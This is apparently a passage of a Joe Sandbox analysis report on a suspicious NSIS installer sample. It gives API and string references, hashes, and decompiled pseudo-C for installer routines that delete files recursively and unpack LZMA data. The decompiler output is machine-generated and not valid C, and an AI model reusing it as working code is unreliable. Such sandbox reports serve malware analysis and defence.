                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
                      • String ID: /D=$ _?=$"$"C:\Users\user\Desktop\nji3Lg1ot6.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\nji3Lg1ot6.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$hM$jefgbrzfgglybaslbprz Setup$~nsu.tmp
                      • API String ID: 2278157092-535596060
                      • Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                      • Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
                      • Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
                      • Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
                      				signed int _v8;
                      				signed int _v12;
                      				struct _WIN32_FIND_DATAA _v332;
                      				signed int _t37;
                      				char* _t49;
                      				signed int _t52;
                      				signed int _t55;
                      				signed int _t61;
                      				signed int _t63;
                      				void* _t65;
                      				signed int _t68;
                      				CHAR* _t70;
                      				CHAR* _t72;
                      				char* _t75;
                      
                      				_t72 = _a4;
                      				_t37 = E00405659(__eflags, _t72);
                      				_v12 = _t37;
                      				if((_a8 & 0x00000008) != 0) {
                      					_t63 = DeleteFileA(_t72); // executed
                      					asm("sbb eax, eax");
                      					_t65 =  ~_t63 + 1;
                      					 *0x423f28 =  *0x423f28 + _t65;
                      					return _t65;
                      				}
                      				_t68 = _a8 & 0x00000001;
                      				__eflags = _t68;
                      				_v8 = _t68;
                      				if(_t68 == 0) {
                      					L5:
                      					E00405A85(0x4214a0, _t72);
                      					__eflags = _t68;
                      					if(_t68 == 0) {
                      						E004055BF(_t72);
                      					} else {
                      						lstrcatA(0x4214a0, "\*.*");
                      					}
                      					__eflags =  *_t72;
                      					if( *_t72 != 0) {
                      						L10:
                      						lstrcatA(_t72, 0x40900c);
                      						L11:
                      						_t70 =  &(_t72[lstrlenA(_t72)]);
                      						_t37 = FindFirstFileA(0x4214a0,  &_v332);
                      						__eflags = _t37 - 0xffffffff;
                      						_a4 = _t37;
                      						if(_t37 == 0xffffffff) {
                      							L29:
                      							__eflags = _v8;
                      							if(_v8 != 0) {
                      								_t31 = _t70 - 1;
                      								 *_t31 =  *(_t70 - 1) & 0x00000000;
                      								__eflags =  *_t31;
                      							}
                      							goto L31;
                      						} else {
                      							goto L12;
                      						}
                      						do {
                      							L12:
                      							_t75 =  &(_v332.cFileName);
                      							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
                      							__eflags =  *_t49;
                      							if( *_t49 != 0) {
                      								__eflags = _v332.cAlternateFileName;
                      								if(_v332.cAlternateFileName != 0) {
                      									_t75 =  &(_v332.cAlternateFileName);
                      								}
                      							}
                      							__eflags =  *_t75 - 0x2e;
                      							if( *_t75 != 0x2e) {
                      								L19:
                      								E00405A85(_t70, _t75);
                      								__eflags = _v332.dwFileAttributes & 0x00000010;
                      								if((_v332.dwFileAttributes & 0x00000010) == 0) {
                      									E0040573D(_t72);
                      									_t52 = DeleteFileA(_t72);
                      									__eflags = _t52;
                      									if(_t52 != 0) {
                      										E00404E23(0xfffffff2, _t72);
                      									} else {
                      										__eflags = _a8 & 0x00000004;
                      										if((_a8 & 0x00000004) == 0) {
                      											 *0x423f28 =  *0x423f28 + 1;
                      										} else {
                      											E00404E23(0xfffffff1, _t72);
                      											_push(0);
                      											_push(_t72);
                      											E004057D3();
                      										}
                      									}
                      								} else {
                      									__eflags = (_a8 & 0x00000003) - 3;
                      									if(__eflags == 0) {
                      										E004053AA(_t70, __eflags, _t72, _a8);
                      									}
                      								}
                      								goto L27;
                      							}
                      							_t61 =  *((intOrPtr*)(_t75 + 1));
                      							__eflags = _t61;
                      							if(_t61 == 0) {
                      								goto L27;
                      							}
                      							__eflags = _t61 - 0x2e;
                      							if(_t61 != 0x2e) {
                      								goto L19;
                      							}
                      							__eflags =  *((char*)(_t75 + 2));
                      							if( *((char*)(_t75 + 2)) == 0) {
                      								goto L27;
                      							}
                      							goto L19;
                      							L27:
                      							_t55 = FindNextFileA(_a4,  &_v332);
                      							__eflags = _t55;
                      						} while (_t55 != 0);
                      						_t37 = FindClose(_a4);
                      						goto L29;
                      					}
                      					__eflags =  *0x4214a0 - 0x5c;
                      					if( *0x4214a0 != 0x5c) {
                      						goto L11;
                      					}
                      					goto L10;
                      				} else {
                      					__eflags = _t37;
                      					if(_t37 == 0) {
                      						L31:
                      						__eflags = _v8;
                      						if(_v8 == 0) {
                      							L39:
                      							return _t37;
                      						}
                      						__eflags = _v12;
                      						if(_v12 != 0) {
                      							_t37 = E00405D7C(_t72);
                      							__eflags = _t37;
                      							if(_t37 == 0) {
                      								goto L39;
                      							}
                      							E00405578(_t72);
                      							E0040573D(_t72);
                      							_t37 = RemoveDirectoryA(_t72);
                      							__eflags = _t37;
                      							if(_t37 != 0) {
                      								return E00404E23(0xffffffe5, _t72);
                      							}
                      							__eflags = _a8 & 0x00000004;
                      							if((_a8 & 0x00000004) == 0) {
                      								goto L33;
                      							}
                      							E00404E23(0xfffffff1, _t72);
                      							_push(0);
                      							_push(_t72);
                      							return E004057D3();
                      						}
                      						L33:
                      						 *0x423f28 =  *0x423f28 + 1;
                      						return _t37;
                      					}
                      					__eflags = _a8 & 0x00000002;
                      					if((_a8 & 0x00000002) == 0) {
                      						goto L31;
                      					}
                      					goto L5;
                      				}
                      			}


















                      APIs
                      • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,74E5F560), ref: 004053C8
                      • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,74E5F560), ref: 00405412
                      • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,74E5F560), ref: 00405433
                      • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,74E5F560), ref: 00405439
                      • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\nji3Lg1ot6.exe" ,74E5F560), ref: 0040544A
                      • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                      • FindClose.KERNEL32(?), ref: 0040550D
                      Strings
                      • C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
                      • "C:\Users\user\Desktop\nji3Lg1ot6.exe" , xrefs: 004053B4
                      • \*.*, xrefs: 0040540C
                      Memory Dump Source
                      • Source File: 00000000.00000002.295109291.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                      • Associated: 00000000.00000002.295105752.0000000000400000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295121992.0000000000407000.00000002.00020000.sdmp
                      • Associated: 00000000.00000002.295133925.0000000000409000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295153716.0000000000422000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295236745.0000000000429000.00000004.00020000.sdmp
                      • Associated: 00000000.00000002.295242311.000000000042C000.00000002.00020000.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_400000_nji3Lg1ot6.jbxd
                      Similarity
                      • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                      • String ID: "C:\Users\user\Desktop\nji3Lg1ot6.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                      • API String ID: 2035342205-2832306324
                      • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                      • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                      • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                      • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 98%
                      			E0040604C() {
                      				unsigned short _t531;
                      				signed int _t532;
                      				void _t533;
                      				void* _t534;
                      				signed int _t535;
                      				signed int _t565;
                      				signed int _t568;
                      				signed int _t590;
                      				signed int* _t607;
                      				void* _t614;
                      
                      				L0:
                      				while(1) {
                      					L0:
                      					if( *(_t614 - 0x40) != 0) {
                      						 *(_t614 - 0x34) = 1;
                      						 *(_t614 - 0x84) = 7;
                      						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
                      						L132:
                      						 *(_t614 - 0x54) = _t607;
                      						L133:
                      						_t531 =  *_t607;
                      						_t590 = _t531 & 0x0000ffff;
                      						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
                      						if( *(_t614 - 0xc) >= _t565) {
                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
                      							 *(_t614 - 0x40) = 1;
                      							_t532 = _t531 - (_t531 >> 5);
                      							 *_t607 = _t532;
                      						} else {
                      							 *(_t614 - 0x10) = _t565;
                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                      							 *_t607 = (0x800 - _t590 >> 5) + _t531;
                      						}
                      						if( *(_t614 - 0x10) >= 0x1000000) {
                      							L139:
                      							_t533 =  *(_t614 - 0x84);
                      							L140:
                      							 *(_t614 - 0x88) = _t533;
                      							goto L1;
                      						} else {
                      							L137:
                      							if( *(_t614 - 0x6c) == 0) {
                      								 *(_t614 - 0x88) = 5;
                      								goto L170;
                      							}
                      							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                      							goto L139;
                      						}
                      					} else {
                      						__eax =  *(__ebp - 0x5c) & 0x000000ff;
                      						__esi =  *(__ebp - 0x60);
                      						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
                      						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
                      						__ecx =  *(__ebp - 0x3c);
                      						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
                      						__ecx =  *(__ebp - 4);
                      						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
                      						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
                      						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
                      						if( *(__ebp - 0x38) >= 4) {
                      							if( *(__ebp - 0x38) >= 0xa) {
                      								_t97 = __ebp - 0x38;
                      								 *_t97 =  *(__ebp - 0x38) - 6;
                      							} else {
                      								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
                      							}
                      						} else {
                      							 *(__ebp - 0x38) = 0;
                      						}
                      						if( *(__ebp - 0x34) == __edx) {
                      							__ebx = 0;
                      							__ebx = 1;
                      							L60:
                      							__eax =  *(__ebp - 0x58);
                      							__edx = __ebx + __ebx;
                      							__ecx =  *(__ebp - 0x10);
                      							__esi = __edx + __eax;
                      							__ecx =  *(__ebp - 0x10) >> 0xb;
                      							__ax =  *__esi;
                      							 *(__ebp - 0x54) = __esi;
                      							__edi = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								_t216 = __edx + 1; // 0x1
                      								__ebx = _t216;
                      								__cx = __ax >> 5;
                      								 *__esi = __ax;
                      							} else {
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edi;
                      								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							 *(__ebp - 0x44) = __ebx;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								L59:
                      								if(__ebx >= 0x100) {
                      									goto L54;
                      								}
                      								goto L60;
                      							} else {
                      								L57:
                      								if( *(__ebp - 0x6c) == 0) {
                      									 *(__ebp - 0x88) = 0xf;
                      									goto L170;
                      								}
                      								__ecx =  *(__ebp - 0x70);
                      								__eax =  *(__ebp - 0xc);
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      								_t202 = __ebp - 0x70;
                      								 *_t202 =  *(__ebp - 0x70) + 1;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      								goto L59;
                      							}
                      						} else {
                      							__eax =  *(__ebp - 0x14);
                      							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                      							if(__eax >=  *(__ebp - 0x74)) {
                      								__eax = __eax +  *(__ebp - 0x74);
                      							}
                      							__ecx =  *(__ebp - 8);
                      							__ebx = 0;
                      							__ebx = 1;
                      							__al =  *((intOrPtr*)(__eax + __ecx));
                      							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
                      							L40:
                      							__eax =  *(__ebp - 0x5b) & 0x000000ff;
                      							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
                      							__ecx =  *(__ebp - 0x58);
                      							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
                      							 *(__ebp - 0x48) = __eax;
                      							__eax = __eax + 1;
                      							__eax = __eax << 8;
                      							__eax = __eax + __ebx;
                      							__esi =  *(__ebp - 0x58) + __eax * 2;
                      							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                      							__ax =  *__esi;
                      							 *(__ebp - 0x54) = __esi;
                      							__edx = __ax & 0x0000ffff;
                      							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
                      							if( *(__ebp - 0xc) >= __ecx) {
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      								__cx = __ax;
                      								 *(__ebp - 0x40) = 1;
                      								__cx = __ax >> 5;
                      								__ebx = __ebx + __ebx + 1;
                      								 *__esi = __ax;
                      							} else {
                      								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
                      								 *(__ebp - 0x10) = __ecx;
                      								0x800 = 0x800 - __edx;
                      								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
                      								__ebx = __ebx + __ebx;
                      								 *__esi = __cx;
                      							}
                      							 *(__ebp - 0x44) = __ebx;
                      							if( *(__ebp - 0x10) >= 0x1000000) {
                      								L38:
                      								__eax =  *(__ebp - 0x40);
                      								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
                      									while(1) {
                      										if(__ebx >= 0x100) {
                      											break;
                      										}
                      										__eax =  *(__ebp - 0x58);
                      										__edx = __ebx + __ebx;
                      										__ecx =  *(__ebp - 0x10);
                      										__esi = __edx + __eax;
                      										__ecx =  *(__ebp - 0x10) >> 0xb;
                      										__ax =  *__esi;
                      										 *(__ebp - 0x54) = __esi;
                      										__edi = __ax & 0x0000ffff;
                      										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                      										if( *(__ebp - 0xc) >= __ecx) {
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                      											__cx = __ax;
                      											_t169 = __edx + 1; // 0x1
                      											__ebx = _t169;
                      											__cx = __ax >> 5;
                      											 *__esi = __ax;
                      										} else {
                      											 *(__ebp - 0x10) = __ecx;
                      											0x800 = 0x800 - __edi;
                      											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                      											__ebx = __ebx + __ebx;
                      											 *__esi = __cx;
                      										}
                      										 *(__ebp - 0x44) = __ebx;
                      										if( *(__ebp - 0x10) < 0x1000000) {
                      											L45:
                      											if( *(__ebp - 0x6c) == 0) {
                      												 *(__ebp - 0x88) = 0xe;
                      												goto L170;
                      											}
                      											__ecx =  *(__ebp - 0x70);
                      											__eax =  *(__ebp - 0xc);
                      											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      											_t155 = __ebp - 0x70;
                      											 *_t155 =  *(__ebp - 0x70) + 1;
                      											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      										}
                      									}
                      									L53:
                      									_t172 = __ebp - 0x34;
                      									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
                      									L54:
                      									__al =  *(__ebp - 0x44);
                      									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
                      									L55:
                      									if( *(__ebp - 0x64) == 0) {
                      										 *(__ebp - 0x88) = 0x1a;
                      										goto L170;
                      									}
                      									__ecx =  *(__ebp - 0x68);
                      									__al =  *(__ebp - 0x5c);
                      									__edx =  *(__ebp - 8);
                      									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                      									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                      									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                      									 *( *(__ebp - 0x68)) = __al;
                      									__ecx =  *(__ebp - 0x14);
                      									 *(__ecx +  *(__ebp - 8)) = __al;
                      									__eax = __ecx + 1;
                      									__edx = 0;
                      									_t191 = __eax %  *(__ebp - 0x74);
                      									__eax = __eax /  *(__ebp - 0x74);
                      									__edx = _t191;
                      									L79:
                      									 *(__ebp - 0x14) = __edx;
                      									L80:
                      									 *(__ebp - 0x88) = 2;
                      									goto L1;
                      								}
                      								if(__ebx >= 0x100) {
                      									goto L53;
                      								}
                      								goto L40;
                      							} else {
                      								L36:
                      								if( *(__ebp - 0x6c) == 0) {
                      									 *(__ebp - 0x88) = 0xd;
                      									L170:
                      									_t568 = 0x22;
                      									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
                      									_t535 = 0;
                      									L172:
                      									return _t535;
                      								}
                      								__ecx =  *(__ebp - 0x70);
                      								__eax =  *(__ebp - 0xc);
                      								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                      								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                      								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                      								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      								_t121 = __ebp - 0x70;
                      								 *_t121 =  *(__ebp - 0x70) + 1;
                      								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                      								goto L38;
                      							}
                      						}
                      					}
                      					L1:
                      					_t534 =  *(_t614 - 0x88);
                      					if(_t534 > 0x1c) {
                      						L171:
                      						_t535 = _t534 | 0xffffffff;
                      						goto L172;
                      					}
                      					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
                      						case 0:
                      							if( *(_t614 - 0x6c) == 0) {
                      								goto L170;
                      							}
                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                      							_t534 =  *( *(_t614 - 0x70));
                      							if(_t534 > 0xe1) {
                      								goto L171;
                      							}
                      							_t538 = _t534 & 0x000000ff;
                      							_push(0x2d);
                      							asm("cdq");
                      							_pop(_t570);
                      							_push(9);
                      							_pop(_t571);
                      							_t610 = _t538 / _t570;
                      							_t540 = _t538 % _t570 & 0x000000ff;
                      							asm("cdq");
                      							_t605 = _t540 % _t571 & 0x000000ff;
                      							 *(_t614 - 0x3c) = _t605;
                      							 *(_t614 - 0x1c) = (1 << _t610) - 1;
                      							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
                      							_t613 = (0x300 << _t605 + _t610) + 0x736;
                      							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
                      								L10:
                      								if(_t613 == 0) {
                      									L12:
                      									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
                      									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
                      									goto L15;
                      								} else {
                      									goto L11;
                      								}
                      								do {
                      									L11:
                      									_t613 = _t613 - 1;
                      									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
                      								} while (_t613 != 0);
                      								goto L12;
                      							}
                      							if( *(_t614 - 4) != 0) {
                      								GlobalFree( *(_t614 - 4));
                      							}
                      							_t534 = GlobalAlloc(0x40, 0x600); // executed
                      							 *(_t614 - 4) = _t534;
                      							if(_t534 == 0) {
                      								goto L171;
                      							} else {
                      								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
                      								goto L10;
                      							}
                      						case 1:
                      							L13:
                      							__eflags =  *(_t614 - 0x6c);
                      							if( *(_t614 - 0x6c) == 0) {
                      								 *(_t614 - 0x88) = 1;
                      								goto L170;
                      							}
                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                      							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
                      							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
                      							_t45 = _t614 - 0x48;
                      							 *_t45 =  *(_t614 - 0x48) + 1;
                      							__eflags =  *_t45;
                      							L15:
                      							if( *(_t614 - 0x48) < 4) {
                      								goto L13;
                      							}
                      							_t546 =  *(_t614 - 0x40);
                      							if(_t546 ==  *(_t614 - 0x74)) {
                      								L20:
                      								 *(_t614 - 0x48) = 5;
                      								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
                      								goto L23;
                      							}
                      							 *(_t614 - 0x74) = _t546;
                      							if( *(_t614 - 8) != 0) {
                      								GlobalFree( *(_t614 - 8));
                      							}
                      							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
                      							 *(_t614 - 8) = _t534;
                      							if(_t534 == 0) {
                      								goto L171;
                      							} else {
                      								goto L20;
                      							}
                      						case 2:
                      							L24:
                      							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
                      							 *(_t614 - 0x84) = 6;
                      							 *(_t614 - 0x4c) = _t553;
                      							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
                      							goto L132;
                      						case 3:
                      							L21:
                      							__eflags =  *(_t614 - 0x6c);
                      							if( *(_t614 - 0x6c) == 0) {
                      								 *(_t614 - 0x88) = 3;
                      								goto L170;
                      							}
                      							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
                      							_t67 = _t614 - 0x70;
                      							 *_t67 =  &(( *(_t614 - 0x70))[1]);
                      							__eflags =  *_t67;
                      							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
                      							L23:
                      							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
                      							if( *(_t614 - 0x48) != 0) {
                      								goto L21;
                      							}
                      							goto L24;
                      						case 4:
                      							goto L133;
                      						case 5:
                      							goto L137;
                      						case 6:
                      							goto L0;
                      						case 7:
                      							__eflags =  *(__ebp - 0x40) - 1;
                      							if( *(__ebp - 0x40) != 1) {
                      								__eax =  *(__ebp - 0x24);
                      								 *(__ebp - 0x80) = 0x16;
                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      								__eax =  *(__ebp - 0x28);
                      								 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      								__eax =  *(__ebp - 0x2c);
                      								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
                      								__eax = 0;
                      								__eflags =  *(__ebp - 0x38) - 7;
                      								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                      								__al = __al & 0x000000fd;
                      								__eax = (__eflags >= 0) - 1 + 0xa;
                      								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
                      								__eax =  *(__ebp - 4);
                      								__eax =  *(__ebp - 4) + 0x664;
                      								__eflags = __eax;
                      								 *(__ebp - 0x58) = __eax;
                      								goto L68;
                      							}
                      							__eax =  *(__ebp - 4);
                      							__ecx =  *(__ebp - 0x38);
                      							 *(__ebp - 0x84) = 8;
                      							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
                      							goto L132;
                      						case 8:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x84) = 0xa;
                      								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
                      							} else {
                      								__eax =  *(__ebp - 0x38);
                      								__ecx =  *(__ebp - 4);
                      								__eax =  *(__ebp - 0x38) + 0xf;
                      								 *(__ebp - 0x84) = 9;
                      								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
                      								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
                      							}
                      							goto L132;
                      						case 9:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								goto L89;
                      							}
                      							__eflags =  *(__ebp - 0x60);
                      							if( *(__ebp - 0x60) == 0) {
                      								goto L171;
                      							}
                      							__eax = 0;
                      							__eflags =  *(__ebp - 0x38) - 7;
                      							_t258 =  *(__ebp - 0x38) - 7 >= 0;
                      							__eflags = _t258;
                      							0 | _t258 = _t258 + _t258 + 9;
                      							 *(__ebp - 0x38) = _t258 + _t258 + 9;
                      							goto L75;
                      						case 0xa:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__eax =  *(__ebp - 4);
                      								__ecx =  *(__ebp - 0x38);
                      								 *(__ebp - 0x84) = 0xb;
                      								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
                      								goto L132;
                      							}
                      							__eax =  *(__ebp - 0x28);
                      							goto L88;
                      						case 0xb:
                      							__eflags =  *(__ebp - 0x40);
                      							if( *(__ebp - 0x40) != 0) {
                      								__ecx =  *(__ebp - 0x24);
                      								__eax =  *(__ebp - 0x20);
                      								 *(__ebp - 0x20) =  *(__ebp - 0x24);
                      							} else {
                      								__eax =  *(__ebp - 0x24);
                      							}
                      							__ecx =  *(__ebp - 0x28);
                      							 *(__ebp - 0x24) =  *(__ebp - 0x28);
                      							L88:
